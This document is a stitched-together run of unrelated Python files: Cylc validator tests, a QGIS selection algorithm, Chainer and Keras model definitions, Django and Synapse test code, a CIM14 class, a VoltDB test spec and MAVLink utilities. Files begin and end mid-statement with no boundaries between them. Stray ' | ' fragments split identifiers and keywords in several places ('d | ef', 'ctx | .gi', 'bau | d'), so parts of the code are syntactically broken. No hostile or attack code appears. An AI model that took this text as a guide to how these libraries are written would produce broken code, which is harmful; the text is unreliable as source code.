("'3.141592654'", 3.141592654),
('-3', -3.0),
('-3.1', -3.1),
('0', 0.0),
('-0', -0.0),
('0.0', 0.0),
('1e20', 1.0e20),
('6.02e23', 6.02e23),
('-1.6021765e-19', -1.6021765e-19),
('6.62607004e-34', 6.62607004e-34), |
]
)
def test_coerce_float(value: str, expected: float):
"""Test coerce_float."""
assert (
ParsecValidator.coerce_float(value, ['whatever']) == approx(expected)
)
def test_coerce_float__empty():
# not a number
assert ParsecValidator.coerce_float('', ['whatever']) is None
@pytest.mark.parametrize(
'value',
['None', ' Who cares? ', 'True', '[]', '[3.14]', '3.14, 2.72']
)
d | ef test_coerce_float__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_float(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('', []),
('3', [3.0]),
('2*3.141592654', [3.141592654, 3.141592654]),
('12*8, 8*12.0', [8.0] * 12 + [12.0] * 8),
('-3, -2, -1, -0.0, 1.0', [-3.0, -2.0, -1.0, -0.0, 1.0]),
('6.02e23, -1.6021765e-19, 6.62607004e-34',
[6.02e23, -1.6021765e-19, 6.62607004e-34]),
]
)
def test_coerce_float_list(value: str, expected: List[float]):
"""Test coerce_float_list."""
items = ParsecValidator.coerce_float_list(value, ['whatever'])
assert items == approx(expected)
@pytest.mark.parametrize(
'value',
['None', 'e, i, e, i, o', '[]', '[3.14]', 'pi, 2.72', '2*True']
)
def test_coerce_float_list__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_float_list(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('0', 0),
('3', 3),
('-3', -3),
('-0', -0),
('653456', 653456),
('-8362583645365', -8362583645365)
]
)
def test_coerce_int(value: str, expected: int):
"""Test coerce_int."""
assert ParsecValidator.coerce_int(value, ['whatever']) == expected
def test_coerce_int__empty():
assert ParsecValidator.coerce_int('', ['whatever']) is None # not a number
@pytest.mark.parametrize(
'value',
['None', ' Who cares? ', 'True', '4.8', '[]', '[3]', '60*60']
)
def test_coerce_int__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_int(value, ['whatever'])
def test_coerce_int_list():
"""Test coerce_int_list."""
validator = ParsecValidator()
# The good
for value, results in [
('', []),
('3', [3]),
('1..10, 11..20..2',
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19]),
('18 .. 24', [18, 19, 20, 21, 22, 23, 24]),
('18 .. 24 .. 3', [18, 21, 24]),
('-10..10..3', [-10, -7, -4, -1, 2, 5, 8]),
('10*3, 4*-6', [3] * 10 + [-6] * 4),
('10*128, -78..-72, 2048',
[128] * 10 + [-78, -77, -76, -75, -74, -73, -72, 2048])
]:
assert validator.coerce_int_list(value, ['whatever']) == results
# The bad
for value in [
'None', 'e, i, e, i, o', '[]', '1..3, x', 'one..ten'
]:
with pytest.raises(IllegalValueError):
validator.coerce_int_list(value, ['whatever'])
def test_coerce_str():
"""Test coerce_str."""
validator = ParsecValidator()
# The good
for value, result in [
('', ''),
('Hello World!', 'Hello World!'),
('"Hello World!"', 'Hello World!'),
('"Hello Cylc\'s World!"', 'Hello Cylc\'s World!'),
("'Hello World!'", 'Hello World!'),
('0', '0'),
('My list is:\nfoo, bar, baz\n', 'My list is:\nfoo, bar, baz'),
(' Hello:\n foo\n bar\n baz\n',
'Hello:\nfoo\nbar\nbaz'),
(' Hello:\n foo\n Greet\n baz\n',
'Hello:\n foo\nGreet\n baz'),
('False', 'False'),
('None', 'None'),
(['a', 'b'], 'a\nb')
]:
assert validator.coerce_str(value, ['whatever']) == result
def test_coerce_str_list():
"""Test coerce_str_list."""
validator = ParsecValidator()
# The good
for value, results in [
('', []),
('Hello', ['Hello']),
('"Hello"', ['Hello']),
('1', ['1']),
('Mercury, Venus, Earth, Mars',
['Mercury', 'Venus', 'Earth', 'Mars']),
('Mercury, Venus, Earth, Mars,\n"Jupiter",\n"Saturn"\n',
['Mercury', 'Venus', 'Earth', 'Mars', 'Jupiter', 'Saturn']),
('New Zealand, United Kingdom',
['New Zealand', 'United Kingdom'])
]:
assert validator.coerce_str_list(value, ['whatever']) == results
def test_strip_and_unquote():
with pytest.raises(IllegalValueError):
ParsecValidator.strip_and_unquote(['a'], '"""')
def test_strip_and_unquote_list_parsec():
"""Test strip_and_unquote_list using ParsecValidator."""
for value, results in [
('"a"\n"b"', ['a', 'b']),
('"a", "b"', ['a', 'b']),
('"a", "b"', ['a', 'b']),
('"c" # d', ['c']),
('"a", "b", "c" # d', ['a', 'b', 'c']),
('"a"\n"b"\n"c" # d', ['a', 'b', 'c']),
("'a', 'b'", ['a', 'b']),
("'c' #d", ['c']),
("'a', 'b', 'c' # d", ['a', 'b', 'c']),
("'a'\n'b'\n'c' # d", ['a', 'b', 'c']),
('a, b, c,', ['a', 'b', 'c']),
('a, b, c # d', ['a', 'b', 'c']),
('a, b, c\n"d"', ['a', 'b', 'd']),
('a, b, c\n"d" # e', ['a', 'b', '"d"'])
]:
assert results == ParsecValidator.strip_and_unquote_list(
['a'], value)
def test_strip_and_unquote_list_cylc(strip_and_unquote_list):
"""Test strip_and_unquote_list using CylcConfigValidator."""
validator = VDR()
for values in strip_and_unquote_list:
value = values[0]
expected = values[1]
output = validator.strip_and_unquote_list(keys=[], value=value)
assert expected == output
def test_strip_and_unquote_list_multiparam():
with pytest.raises(ListValueError):
ParsecValidator.strip_and_unquote_list(
['a'], 'a, b, c<a,b>'
)
def test_coerce_cycle_point():
"""Test coerce_cycle_point."""
validator = VDR()
# The good
for value, result in [
('', None),
('3', '3'),
('2018', '2018'),
('20181225T12Z', '20181225T12Z'),
('2018-12-25T12:00+11:00', '2018-12-25T12:00+11:00')]:
assert validator.coerce_cycle_point(value, ['whatever']) == result
# The bad
for value in [
'None', ' Who cares? ', 'True', '1, 2', '20781340E10']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point(value, ['whatever'])
def test_coerce_cycle_point_format():
"""Test coerce_cycle_point_format."""
validator = VDR()
# The good
for value, result in [
('', None),
('%Y%m%dT%H%M%z', '%Y%m%dT%H%M%z'),
('CCYYMMDDThhmmZ', 'CCYYMMDDThhmmZ'),
('XCCYYMMDDThhmmZ', 'XCCYYMMDDThhmmZ')]:
assert (
validator.coerce_cycle_point_format(value, ['whatever'])
== result
)
# The bad
# '/' and ':' not allowed in cylc cycle points (they are used in paths).
for value in ['%i%j', 'Y/M/D', '%Y-%m-%dT%H:%MZ']:
with pytest.raises(IllegalValueError):
validator.coerce_cycle_point_format(value, ['whatever'])
def test_coerce_cycle_point_time_zone():
"""Test coerce_cycle_point_time_zone."""
validator = VDR()
# The good
for value, result in [
('', None),
('Z', 'Z'),
('+0000', '+0000'),
('+0100', '+0100'),
('+1300', '+1300'),
('-0630', '-0630')]:
assert (
validator.coerce_cycle_point_time_zone(value, ['whatever'])
== result
)
# The bad
for value in ['None' |
import click
from arrow.cli import pass_context, json_loads
from arrow.decorators import custom_exception, dict_output
@click.command('get_comments')
@click.argument("feature_id", type=str)
@click.option(
"--organism",
help="Organism Co | mmon Name",
type=str
)
@click.option(
"--sequence",
help="Sequence Name",
type=str
)
@pass_context
@custom_exception
@dict_output
def cli(ctx, feature_id, organism="", sequence=""):
"""Get a feature's comments
Output:
A standard apollo feature dictionary ({"features": [{...}]})
"""
return ctx | .gi.annotations.get_comments(feature_id, organism=organism, sequence=sequence)
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SelectByAttribute.py
---------------------
Date : May 2010
Copyright : (C) 2010 by Michael Minn
Email : pyqgis at michaelminn dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Minn'
__date__ = 'May 2010'
__copyright__ = '(C) 2010, Michael Minn'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.PyQt.QtCore import QVariant
from qgis.core import (QgsExpression,
QgsProcessingException,
QgsProcessingParameterVectorLayer,
QgsProcessingParameterField,
QgsProcessingParameterEnum,
QgsProcessingParameterString,
QgsProcessingOutputVectorLayer)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class SelectByAttribute(QgisAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OPERATOR = 'OPERATOR'
VALUE = 'VALUE'
OUTPUT = 'OUTPUT'
OPERATORS = ['=',
'!=',
'>',
'>=',
'<',
'<=',
'begins with',
'contains',
'is null',
'is not null',
| 'does not contain'
]
STRING_OPERATORS = ['begins with',
'contains',
'does not contain']
def tags(self):
return self.tr('select,attribute,value,contains,null,field').split(',')
def group(self):
return self.tr('Vector selection')
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.i18n_operators | = ['=',
'!=',
'>',
'>=',
'<',
'<=',
self.tr('begins with'),
self.tr('contains'),
self.tr('is null'),
self.tr('is not null'),
self.tr('does not contain')
]
self.addParameter(QgsProcessingParameterVectorLayer(self.INPUT, self.tr('Input layer')))
self.addParameter(QgsProcessingParameterField(self.FIELD,
self.tr('Selection attribute'), parentLayerParameterName=self.INPUT))
self.addParameter(QgsProcessingParameterEnum(self.OPERATOR,
self.tr('Operator'), self.i18n_operators))
self.addParameter(QgsProcessingParameterString(self.VALUE, self.tr('Value')))
self.addOutput(QgsProcessingOutputVectorLayer(self.OUTPUT, self.tr('Selected (attribute)')))
def name(self):
return 'selectbyattribute'
def displayName(self):
return self.tr('Select by attribute')
def processAlgorithm(self, parameters, context, feedback):
layer = self.parameterAsVectorLayer(parameters, self.INPUT, context)
fieldName = self.parameterAsString(parameters, self.FIELD, context)
operator = self.OPERATORS[self.parameterAsEnum(parameters, self.OPERATOR, context)]
value = self.parameterAsString(parameters, self.VALUE, context)
fields = layer.fields()
idx = layer.fields().lookupField(fieldName)
fieldType = fields[idx].type()
if fieldType != QVariant.String and operator in self.STRING_OPERATORS:
op = ''.join(['"%s", ' % o for o in self.STRING_OPERATORS])
raise QgsProcessingException(
self.tr('Operators {0} can be used only with string fields.').format(op))
field_ref = QgsExpression.quotedColumnRef(fieldName)
quoted_val = QgsExpression.quotedValue(value)
if operator == 'is null':
expression_string = '{} IS NULL'.format(field_ref)
elif operator == 'is not null':
expression_string = '{} IS NOT NULL'.format(field_ref)
elif operator == 'begins with':
expression_string = """%s LIKE '%s%%'""" % (field_ref, value)
elif operator == 'contains':
expression_string = """%s LIKE '%%%s%%'""" % (field_ref, value)
elif operator == 'does not contain':
expression_string = """%s NOT LIKE '%%%s%%'""" % (field_ref, value)
else:
expression_string = '{} {} {}'.format(field_ref, operator, quoted_val)
expression = QgsExpression(expression_string)
if expression.hasParserError():
raise QgsProcessingException(expression.parserErrorString())
layer.selectByExpression(expression_string)
return {self.OUTPUT: parameters[self.INPUT]}
|
import chainer
import chainer.functions as F
import chainer.links as L
class vgga(chainer.Chain):
insize = 224
def __init__(self):
super(vgga, self).__init__()
with self.init_scope():
self.conv1 = L.Convolution2D( 3, 64, 3, stride=1, pad=1)
self.conv2 = L.Convolution2D( 64, 128, 3, stride=1, pad=1)
self.conv3 = L.Convolution2D(128, 256, 3, stride=1, pad=1)
self.conv4 = L.Convolution2D(256, 256, 3, stride=1, pad=1)
self.conv5 = L.Convolution2D(256, 512, 3, stride=1, pad=1)
self.conv6 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv7 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv8 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.fc6 = L.Linear(512 * 7 * 7, 4096)
self.fc7 = L.Linear(4096, 4096)
self.fc8 = L.Linear(4096, 1000)
def forward(self, x):
h = F.max_pooling_2d(F.relu(self.conv1(x)), 2, stride=2)
h | = F.max_pooling_2d(F.relu(self.conv2(h)), 2, stride=2)
h = F.relu(self.conv3(h))
h = F.max_pooling_2d(F.relu(self.conv4(h)), 2, stride=2)
h = F.relu(self.conv5(h))
h = F.max_pooling_2d(F.relu(self.conv6(h)), 2, stride=2)
| h = F.relu(self.conv7(h))
h = F.max_pooling_2d(F.relu(self.conv8(h)), 2, stride=2)
h = F.relu(self.fc6(h))
h = F.relu(self.fc7(h))
return self.fc8(h)
|
from django.core.checks.urls import check_url_config
from django.test import SimpleTestCase
from django.test.utils import override_settings
class CheckUrlsTest(SimpleTestCase):
@override_settings(ROOT_URLCONF='check_framework.urls_no_warnings')
def test_include_no_warnings(self):
result = check_url_config(None)
self.assertEqual(result, [])
@override_settings(ROOT_URLCONF='check_framework.urls_include')
def test_include_with_dollar(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W001')
expected_msg = "Your URL pattern '^include-with-dollar$' uses include with a regex ending with a '$'."
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_slash')
def test_url_beginning_with_slash(self):
result = check_url_config(None)
self.assertEqual(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W002')
expected_msg = "Your URL pattern '/starting-with-slash/$' has a regex beginning with a '/'"
self.assertIn(expected_msg, warning.msg)
@override_settings(ROOT_URLCONF='check_framework.urls_name')
def test_url_pattern_name_with_colon(self):
result = check_url_config(None)
self.assertEqu | al(len(result), 1)
warning = result[0]
self.assertEqual(warning.id, 'urls.W003')
expected_msg = "Your URL pattern '^$' [name='name_with:colon'] has a name including a ':'."
self.assertIn(expected_msg, wa | rning.msg)
|
"""Find all models written by user Hut | ton, including the DOI and the
source code repository for each model.
"""
from ask_api_examples import make_query
query = '[[Last name::Hutton]]|?DOI model|?Source web address'
def main():
r = make_query(query, __file__)
return r
if __name__ == '__main__':
print main()
| |
genet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(299, 299, 3)`.
It should have exactly 3 inputs channels,
and width and height should be no smaller than 71.
E.g. `(150, 150, 3)` would be one valid value.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
# Raises
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
RuntimeError: If attempting to run this model with a
backend that does not support separable convolutions.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
if K.backend() != 'tensorflow':
raise RuntimeError('The Xception model is only available with '
'the TensorFlow backend.')
if K.image_data_format() != 'channels_last':
warnings.warn('The Xception model is only available for the '
'input data format "channels_last" '
'(width, height, channels). '
'However your settings specify the default '
'data format "channels_first" (channels, width, height). '
'You should set `image_data_format="channels_last"` i | n your Keras '
'config located at ~/.keras/keras.json. '
'The model being returned right now will expect inputs '
'to follow the "channels_last" data format.')
K.set_image_data_format('channels_last')
old_data_format = 'channels_first'
else:
old_data_format = None
# Determine proper input shape
input_shape = _obtain_input_shape(input_shape,
default_size=299,
| min_size=71,
data_format=K.image_data_format(),
include_top=include_top)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
x = Conv2D(32, (3, 3), strides=(2, 2), use_bias=False, name='block1_conv1')(img_input)
x = BatchNormalization(name='block1_conv1_bn')(x)
x = Activation('relu', name='block1_conv1_act')(x)
x = Conv2D(64, (3, 3), use_bias=False, name='block1_conv2')(x)
x = BatchNormalization(name='block1_conv2_bn')(x)
x = Activation('relu', name='block1_conv2_act')(x)
residual = Conv2D(128, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv1')(x)
x = BatchNormalization(name='block2_sepconv1_bn')(x)
x = Activation('relu', name='block2_sepconv2_act')(x)
x = SeparableConv2D(128, (3, 3), padding='same', use_bias=False, name='block2_sepconv2')(x)
x = BatchNormalization(name='block2_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block2_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(256, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block3_sepconv1_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv1')(x)
x = BatchNormalization(name='block3_sepconv1_bn')(x)
x = Activation('relu', name='block3_sepconv2_act')(x)
x = SeparableConv2D(256, (3, 3), padding='same', use_bias=False, name='block3_sepconv2')(x)
x = BatchNormalization(name='block3_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block3_pool')(x)
x = layers.add([x, residual])
residual = Conv2D(728, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block4_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv1')(x)
x = BatchNormalization(name='block4_sepconv1_bn')(x)
x = Activation('relu', name='block4_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block4_sepconv2')(x)
x = BatchNormalization(name='block4_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block4_pool')(x)
x = layers.add([x, residual])
for i in range(8):
residual = x
prefix = 'block' + str(i + 5)
x = Activation('relu', name=prefix + '_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv1')(x)
x = BatchNormalization(name=prefix + '_sepconv1_bn')(x)
x = Activation('relu', name=prefix + '_sepconv2_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv2')(x)
x = BatchNormalization(name=prefix + '_sepconv2_bn')(x)
x = Activation('relu', name=prefix + '_sepconv3_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name=prefix + '_sepconv3')(x)
x = BatchNormalization(name=prefix + '_sepconv3_bn')(x)
x = layers.add([x, residual])
residual = Conv2D(1024, (1, 1), strides=(2, 2),
padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu', name='block13_sepconv1_act')(x)
x = SeparableConv2D(728, (3, 3), padding='same', use_bias=False, name='block13_sepconv1')(x)
x = BatchNormalization(name='block13_sepconv1_bn')(x)
x = Activation('relu', name='block13_sepconv2_act')(x)
x = SeparableConv2D(1024, (3, 3), padding='same', use_bias=False, name='block13_sepconv2')(x)
x = BatchNormalization(name='block13_sepconv2_bn')(x)
x = MaxPooling2D((3, 3), strides=(2, 2), padding='same', name='block13_pool')(x)
x = layers.add([x, residual])
x = SeparableConv2D(1536, (3, 3), padding='same', use_bias=False, name='block14_sepconv1')(x)
x = BatchNormalization(name='block14_sepconv1_bn')(x)
x = Activation('relu', name='block14_sepconv1_act')(x)
x = SeparableConv2D(2048, (3, 3), padding='same', use_bias=False, name='block14_sepconv2')(x)
x = BatchNormalization(name='block14_sepconv2_bn')(x)
x = Activation('relu', name='block14_sepconv2_act')(x)
if include_top:
x = GlobalAveragePooling2D(name='avg_pool')(x)
x = Dense(classes, activation='softmax', name='predictions')(x)
else:
if pooling == 'avg':
x = GlobalAveragePooling2D()(x)
elif pooling == 'max':
|
def f():
try:
| a = 1
except:
| b = 1
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.Element import Element
class LineDetail(Element):
"""Details on an amount line, with rounding, date and note.
"""
def __init__(self, dateTime='', rounding=0.0, note='', amount=0.0, *args, **kw_args):
"""Initialises a new 'LineDetail' instance.
@param dateTime: Date and time when this line was created in the a | pplication process.
@param rounding: Totalised monetary value of all errors due to process rounding or truncating that is not reflected in 'amount'.
@param note: Free format note relevant to this line.
@param amount: Amount for this line item.
"""
#: Date and time when this line was created in the application process.
self.dateTime = dateTime
#: Totalised monetary value of all errors due to process rounding or truncating that is not refle | cted in 'amount'.
self.rounding = rounding
#: Free format note relevant to this line.
self.note = note
#: Amount for this line item.
self.amount = amount
super(LineDetail, self).__init__(*args, **kw_args)
_attrs = ["dateTime", "rounding", "note", "amount"]
_attr_types = {"dateTime": str, "rounding": float, "note": str, "amount": float}
_defaults = {"dateTime": '', "rounding": 0.0, "note": '', "amount": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
#!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2010 VoltDB Inc.
#
# VoltDB is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# VoltDB is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
testspec = """
class Database {
/** test comment */
// more comments
Partition* partitions; // more comments
Table* tables;
Program* programs;
Procedure* procedures;
}
/*
class Garbage {
Garbage garbage;
}
*/
class Partition {
bool isActive;
Range* ranges;
Replica* replicas;
}
cl | ass Table {
int type;
Table? buddy1;
Table? buddy2;
Column* columns;
Index* indexes;
Constraint* constraints;
}
class Program {
Program* programs;
Procedure* procedu | res;
Table* tables;
}
"""
def checkeq( a, b ):
if a != b:
raise Exception( 'test failed: %r != %r' % (a,b) )
|
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# twisted imports
from twisted.internet import defer
# trial imports
from tests import unittest
from synapse.api.constants import Membership
import json
import time
class RestTestCase(unittest.TestCase):
"""Contains extra helper functions to quickly and clearly perform a given
REST action, which isn't the focus of the test.
This subclass assumes there are mock_resource and auth_user_id attributes.
"""
def __init__(self, *args, **kwargs):
super(RestTestCase, self).__init__(*args, **kwargs)
self.mock_resource = None
self.auth_user_id = None
def mock_get_user_by_token(self, token=None):
return self.auth_user_id
@defer.inlineCallbacks
def create_room_as(self, room_creator, is_public=True, tok=None):
temp_id = self.auth_user_id
self.auth_user_id = room_creator
path = "/createRoom"
content = "{}"
if not is_public:
content = '{"visibility":"private"}'
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("POST", path, content)
self.assertEquals(200, code, msg=str(response))
self.auth_user_id = temp_id
defer.returnValue(response["room_id"])
@defer.inlineCallbacks
def invite(self, room=None, src=None, targ=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=src, targ=targ, tok=tok,
membership=Membership.INVITE,
expect_code=expect_code)
@defer.inlineCallbacks
def join(self | , room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.JOIN,
expect_code=expect_code)
@defer.inlineCallba | cks
def leave(self, room=None, user=None, expect_code=200, tok=None):
yield self.change_membership(room=room, src=user, targ=user, tok=tok,
membership=Membership.LEAVE,
expect_code=expect_code)
@defer.inlineCallbacks
def change_membership(self, room, src, targ, membership, tok=None,
expect_code=200):
temp_id = self.auth_user_id
self.auth_user_id = src
path = "/rooms/%s/state/m.room.member/%s" % (room, targ)
if tok:
path = path + "?access_token=%s" % tok
data = {
"membership": membership
}
(code, response) = yield self.mock_resource.trigger("PUT", path,
json.dumps(data))
self.assertEquals(expect_code, code, msg=str(response))
self.auth_user_id = temp_id
@defer.inlineCallbacks
def register(self, user_id):
(code, response) = yield self.mock_resource.trigger(
"POST",
"/register",
json.dumps({
"user": user_id,
"password": "test",
"type": "m.login.password"
}))
self.assertEquals(200, code)
defer.returnValue(response)
@defer.inlineCallbacks
def send(self, room_id, body=None, txn_id=None, tok=None,
expect_code=200):
if txn_id is None:
txn_id = "m%s" % (str(time.time()))
if body is None:
body = "body_text_here"
path = "/rooms/%s/send/m.room.message/%s" % (room_id, txn_id)
content = '{"msgtype":"m.text","body":"%s"}' % body
if tok:
path = path + "?access_token=%s" % tok
(code, response) = yield self.mock_resource.trigger("PUT", path, content)
self.assertEquals(expect_code, code, msg=str(response))
def assert_dict(self, required, actual):
"""Does a partial assert of a dict.
Args:
required (dict): The keys and value which MUST be in 'actual'.
actual (dict): The test result. Extra keys will not be checked.
"""
for key in required:
self.assertEquals(required[key], actual[key],
msg="%s mismatch. %s" % (key, actual))
|
"""Log MAVLink stream."""
import argparse
from pymavlink import mavutil
import pymavlink.dialects.v10.ceaufmg as mavlink
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--verbose", action='store_true',
help="print messages to STDOUT")
parser.add_argument("--device", required=True, help="serial port")
parser.add_argument("--log", type=argparse.FileType('w'),
help="Log file")
parser.add_argument("--baudrate", type=int, help="serial port baud rate",
default=57600)
args = parser.parse_args()
conn = mavutil.mavlink_connection(args.device, bau | d=args.baudrate)
conn.logfile = args.log
while True:
msg = conn.recv_msg()
| if args.verbose and msg is not None:
print(msg)
if __name__ == '__main__':
main()
|
if ret > 180:
ret -= 360;
if ret < -180:
ret += 360
return ret
average_data = {}
def average(var, key, N):
'''average over N points'''
global average_data
if not key in average_data:
average_data[key] = [var]*N
return var
average_data[key].pop(0)
average_data[key].append(var)
return sum(average_data[key])/N
derivative_data = {}
def second_derivative_5(var, key):
'''5 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*5)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
ret = ((data[4] + data[0]) - 2*data[2]) / (4*h**2)
return ret
def second_derivative_9(var, key):
'''9 point 2nd derivative'''
global derivative_data
import mavutil
tnow = mavutil.mavfile_global.timestamp
if not key in derivative_data:
derivative_data[key] = (tnow, [var]*9)
return 0
(last_time, data) = derivative_data[key]
data.pop(0)
data.append(var)
derivative_data[key] = (tnow, data)
h = (tnow - last_time)
# N=5 2nd derivative from
# http://www.holoborodko.com/pavel/numerical-methods/numerical-derivative/smooth-low-noise-differentiators/
f = data
ret = ((f[8] + f[0]) + 4*(f[7] + f[1]) + 4*(f[6]+f[2]) - 4*(f[5]+f[3]) - 10*f[4])/(64*h**2)
return ret
lowpass_data = {}
def lowpass(var, key, factor):
'''a simple lowpass filter'''
global lowpass_data
if not key in lowpass_data:
lowpass_data[key] = var
else:
lowpass_data[key] = factor*lowpass_data[key] + (1.0 - factor)*var
return lowpass_data[key]
last_diff = {}
def diff(var, key):
'''calculate differences between values'''
global last_diff
ret = 0
if not key in last_diff:
last_diff[key] = var
return 0
ret = var - last_diff[key]
last_diff[key] = var
return ret
last_delta = {}
def delta(var, key, tusec=None):
'''calculate slope'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
ret = (var - last_v) / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def delta_angle(var, key, tusec=None):
'''calculate slope of an angle'''
global last_delta
if tusec is not None:
tnow = tusec * 1.0e-6
else:
import mavutil
tnow = mavutil.mavfile_global.timestamp
dv = 0
ret = 0
if key in last_delta:
(last_v, last_t, last_ret) = last_delta[key]
if last_t == tnow:
return last_ret
if tnow == last_t:
ret = 0
else:
dv = var - last_v
if dv > 180:
dv -= 360
if dv < -180:
dv += 360
ret = dv / (tnow - last_t)
last_delta[key] = (var, tnow, ret)
return ret
def roll_estimate(RAW_IMU,GPS_RAW_INT=None,ATTITUDE=None,SENSOR_OFFSETS=None, ofs=None, mul=None,smooth=0.7):
'''estimate roll from accelerometer'''
